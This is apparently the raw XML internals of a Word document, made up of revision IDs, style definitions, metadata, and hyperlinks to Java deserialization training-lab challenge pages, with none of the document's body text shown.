    <w:rsid w:val="0005206C"/>
    <w:rsid w:val="00067902"/>
    <w:rsid w:val="00071482"/>
    <w:rsid w:val="00074967"/>
    <w:rsid w:val="000806C7"/>
    <w:rsid w:val="00083A65"/>
    <w:rsid w:val="00085728"/>
    <w:rsid w:val="000D2311"/>
    <w:rsid w:val="001120A2"/>
    <w:rsid w:val="0012540E"/>
    <w:rsid w:val="00125E5B"/>
    <w:rsid w:val="001452AF"/>
    <w:rsid w:val="00146709"/>
    <w:rsid w:val="00147DEA"/>
    <w:rsid w:val="001535AD"/>
    <w:rsid w:val="00166213"/>
    <w:rsid w:val="00172DB3"/>
    <w:rsid w:val="001A4730"/>
    <w:rsid w:val="001B7E5A"/>
    <w:rsid w:val="001D4A7D"/>
    <w:rsid w:val="001F7BC3"/>
    <w:rsid w:val="002146CF"/>
    <w:rsid w:val="00231EA9"/>
    <w:rsid w:val="002704C5"/>
    <w:rsid w:val="002735F4"/>
    <w:rsid w:val="00274FBF"/>
    <w:rsid w:val="0029537B"/>
    <w:rsid w:val="002A6FD7"/>
    <w:rsid w:val="002B505C"/>
    <w:rsid w:val="002C283F"/>
    <w:rsid w:val="002C76D9"/>
    <w:rsid w:val="002E7FEB"/>
    <w:rsid w:val="002F5089"/>
    <w:rsid w:val="00303EEA"/>
    <w:rsid w:val="00306D3A"/>
    <w:rsid w:val="00323905"/>
    <w:rsid w:val="0033748D"/>
    <w:rsid w:val="00341126"/>
    <w:rsid w:val="00392F91"/>
    <w:rsid w:val="003A1C78"/>
    <w:rsid w:val="003A3836"/>
    <w:rsid w:val="003B2FDB"/>
    <w:rsid w:val="003F14C2"/>
    <w:rsid w:val="003F365E"/>
    <w:rsid w:val="0041729F"/>
    <w:rsid w:val="004345FB"/>
    <w:rsid w:val="00435A38"/>
    <w:rsid w:val="0044348A"/>
    <w:rsid w:val="004768F5"/>
    <w:rsid w:val="00485265"/>
    <w:rsid w:val="00487173"/>
    <w:rsid w:val="004877B2"/>
    <w:rsid w:val="00487DE2"/>
    <w:rsid w:val="00496551"/>
    <w:rsid w:val="004A429C"/>
    <w:rsid w:val="004A7FA9"/>
    <w:rsid w:val="004D0AF8"/>
    <w:rsid w:val="004E1D9C"/>
    <w:rsid w:val="005300C7"/>
    <w:rsid w:val="00531328"/>
    <w:rsid w:val="00536281"/>
    <w:rsid w:val="0055387A"/>
    <w:rsid w:val="00562E86"/>
    <w:rsid w:val="00591DBA"/>
    <w:rsid w:val="005A6FB7"/>
    <w:rsid w:val="005D0F1F"/>
    <w:rsid w:val="005E055E"/>
    <w:rsid w:val="005F436A"/>
    <w:rsid w:val="006346DD"/>
    <w:rsid w:val="0065198C"/>
    <w:rsid w:val="00656DD1"/>
    <w:rsid w:val="006A2A76"/>
    <w:rsid w:val="006D1300"/>
    <w:rsid w:val="00711EBC"/>
    <w:rsid w:val="00717F5A"/>
    <w:rsid w:val="00723784"/>
    <w:rsid w:val="007275D8"/>
    <w:rsid w:val="0074578A"/>
    <w:rsid w:val="0075470A"/>
    <w:rsid w:val="0076592C"/>
    <w:rsid w:val="007C7841"/>
    <w:rsid w:val="007D00FC"/>
    <w:rsid w:val="007E1F41"/>
    <w:rsid w:val="007E2E7E"/>
    <w:rsid w:val="00804E36"/>
    <w:rsid w:val="00842A8D"/>
    <w:rsid w:val="008A24CD"/>
    <w:rsid w:val="008A2D70"/>
    <w:rsid w:val="008A4ED5"/>
    <w:rsid w:val="008A5B4A"/>
    <w:rsid w:val="008F23E1"/>
    <w:rsid w:val="008F6138"/>
    <w:rsid w:val="008F7850"/>
    <w:rsid w:val="00915B26"/>
    <w:rsid w:val="0092004F"/>
    <w:rsid w:val="00923822"/>
    <w:rsid w:val="0095577B"/>
    <w:rsid w:val="009626BD"/>
    <w:rsid w:val="00994592"/>
    <w:rsid w:val="009A037B"/>
    <w:rsid w:val="009D2055"/>
    <w:rsid w:val="009D2794"/>
    <w:rsid w:val="009E4236"/>
    <w:rsid w:val="009F108F"/>
    <w:rsid w:val="009F5714"/>
    <w:rsid w:val="00A23C67"/>
    <w:rsid w:val="00A4464E"/>
    <w:rsid w:val="00A666BE"/>
    <w:rsid w:val="00A76F7A"/>
    <w:rsid w:val="00AC5461"/>
    <w:rsid w:val="00AC5D23"/>
    <w:rsid w:val="00AC7313"/>
    <w:rsid w:val="00AE0A75"/>
    <w:rsid w:val="00AE5F1F"/>
    <w:rsid w:val="00B018DE"/>
    <w:rsid w:val="00B0562D"/>
    <w:rsid w:val="00B07A7B"/>
    <w:rsid w:val="00B17B5A"/>
    <w:rsid w:val="00B20DBD"/>
    <w:rsid w:val="00B3544F"/>
    <w:rsid w:val="00B6293F"/>
    <w:rsid w:val="00BA6AA2"/>
    <w:rsid w:val="00BB11DC"/>
    <w:rsid w:val="00BB5456"/>
    <w:rsid w:val="00BC22C6"/>
    <w:rsid w:val="00BF34EA"/>
    <w:rsid w:val="00C06ACA"/>
    <w:rsid w:val="00C17E6D"/>
    <w:rsid w:val="00C34353"/>
    <w:rsid w:val="00C532DB"/>
    <w:rsid w:val="00C545B6"/>
    <w:rsid w:val="00CA67D1"/>
    <w:rsid w:val="00CC11EF"/>
    <w:rsid w:val="00CE6229"/>
    <w:rsid w:val="00CF04EC"/>
    <w:rsid w:val="00CF4C45"/>
    <w:rsid w:val="00D02FE5"/>
    <w:rsid w:val="00D51656"/>
    <w:rsid w:val="00D87253"/>
    <w:rsid w:val="00DA2CAB"/>
    <w:rsid w:val="00DA37F9"/>
    <w:rsid w:val="00DA6BDD"/>
    <w:rsid w:val="00DB1330"/>
    <w:rsid w:val="00DC604F"/>
    <w:rsid w:val="00DD7443"/>
    <w:rsid w:val="00DE3793"/>
    <w:rsid w:val="00DE7C28"/>
    <w:rsid w:val="00DF5C6E"/>
    <w:rsid w:val="00DF67ED"/>
    <w:rsid w:val="00E11ECC"/>
    <w:rsid w:val="00E26702"/>
    <w:rsid w:val="00E50515"/>
    <w:rsid w:val="00E50EF7"/>
    <w:rsid w:val="00E521BF"/>
    <w:rsid w:val="00E70B15"/>
    <w:rsid w:val="00E91992"/>
    <w:rsid w:val="00E9616E"/>
    <w:rsid w:val="00E962FF"/>
    <w:rsid w:val="00EA3E75"/>
    <w:rsid w:val="00EB7BAD"/>
    <w:rsid w:val="00EC3383"/>
    <w:rsid w:val="00EF0A30"/>
    <w:rsid w:val="00F233BC"/>
    <w:rsid w:val="00F43328"/>
    <w:rsid w:val="00F801CD"/>
    <w:rsid w:val="00FB4D3D"/>
    <w:rsid w:val="00FB7823"/>
    <w:rsid w:val="00FC0161"/>
    <w:rsid w:val="00FD10C4"/>
    <w:rsid w:val="00FE001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25E5F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{14532FD3-8E62-404B-AA8C-0BEE11154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55E"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00DA2C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C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C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C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C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C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C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C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C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2C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2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CAB"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00DA2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CAB"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00DA2CAB"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00DA2CAB"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00DA2CAB"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00DA2C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CAB"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00DA2CAB"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DA2CAB"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007E2E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yperlink" Target="http://java-deserialization.cyberjutsu-lab.tech:13336/java-deserialize-lv3-1.0-SNAPSHOT"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java-deserialization.cyberjutsu-lab.tech:13335/java-deserialize-lv2-1.0-SNAPSHOT"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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://java-deserialization.cyberjutsu-lab.tech:13334/java-deserialize-lv1-1.0-SNAPSHOT"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wpt.cyberjutsu.io/challenges"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java-deserialization.cyberjutsu-lab.tech:13337/java-deserialize-lv4-1.0-SNAPSHO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2980</TotalTime>
  <Pages>19</Pages>
  <Words>3274</Words>
  <Characters>18663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5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-22T10:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-25T15:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>